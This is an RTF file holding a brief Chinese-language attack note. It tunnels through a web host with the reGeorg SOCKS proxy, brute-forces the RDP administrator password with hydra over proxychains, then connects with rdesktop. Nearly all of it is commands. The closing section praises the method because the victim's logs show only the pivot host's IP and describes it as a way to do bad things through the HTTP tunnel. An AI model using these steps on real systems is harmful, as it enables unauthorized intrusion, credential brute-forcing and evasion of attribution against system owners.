{\rtf1\ansi\ansicpg936\cocoartf1561\cocoasubrtf600
{\fonttbl\f0\fswiss\fcharset0 Helvetica;\f1\fnil\fcharset134 PingFangSC-Regular;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\paperw11900\paperh16840\margl1440\margr1440\vieww12600\viewh7800\viewkind0
\pard\tx566\tx934\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\fs24 \cf0 1.
\f1 \'cf\'c2\'d4\'d8\'cf\'ee\'c4\'bf
\f0 https://github.com/sensepost/reGeorg\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0
\cf0 2.
\f1 \'bd\'ab\'c4\'bf\'b1\'ea
\f0 Client
\f1 \'b7\'a2\'cb\'cd\'b5\'bd\'c4\'bf\'b1\'ea\'d6\'f7\'bb\'fa
\f0 \
3.kali
\f1 \'c9\'cf\'d6\'c1\'cf\'c2
\f0 python reGeorgSocksProxy.py -u http://IP/client
\f1 \'ce\'c4\'bc\'fe\'c2\'b7\'be\'b6
\f0  -p 
\f1 \'b1\'be\'b5\'d8\'bc\'e0\'cc\'fd\'b5\'c4\'b6\'cb\'bf\'da
\f0 \
3.
\f1 \'c8\'bb\'ba\'f3\'ca\'b9\'d3\'c3
\f0 proxyhains hydra  -s 3389 -v -l administrator -p dict.txt -t IP\
4.
\f1 \'b1\'ac\'c6\'c6\'b3\'c9\'b9\'a6\'ba\'f3\'ca\'b9\'d3\'c3
\f0 proxyhains rdesktop  
\f1 \'bd\'f8\'d0\'d0\'c1\'ac\'bd\'d3
\f0 \
\

\f1 \'ba\'c3\'b4\'a6\'a3\'ba
\f0 \

\f1 \'cd\'a8\'b9\'fd
\f0 http
\f1 \'d0\'ad\'d2\'e9\'b4\'b4\'bd\'a8\'b5\'c4\'cb\'ed\'b5\'c0\'a3\'ac\'c8\'bb\'ba\'f3\'d4\'da\'be\'ad\'b9\'fd
\f0 http
\f1 \'cb\'ed\'b5\'c0\'bd\'f8\'d0\'d0
\f0 rdp
\f1 \'b1\'ac\'c6\'c6\'bb\'f2\'d5\'df\'d6\'b4\'d0\'d0\'c6\'e4\'cb\'fb\'b2\'d9\'d7\'f7\'a1\'a3\'c4\'bf\'b1\'ea\'c8\'d5\'d6\'be\'bc\'c7\'c2\'bc\'b5\'c4\'b6\'bc\'ca\'c7\'cb\'fb\'b5\'c4
\f0 IP
\f1 \'a3\'ac\'d5\'e2\'d2\'b2\'ca\'c7\'d5\'e2\'b8\'f6\'cf\'ee\'c4\'bf\'b5\'c4\'ba\'c3\'b4\'a6\'d6\'ae\'d2\'bb\'a1\'a3\'cd\'a8\'b9\'fd
\f0 http
\f1 \'cb\'ed\'b5\'c0\'b8\'c9\'bb\'b5\'ca\'c2
\f0 \

\f1 \'b2\'ce\'bf\'bc\'ce\'c4\'d5\'c2\'a3\'ba
\f0 https://www.freebuf.com/articles/web/191375.html}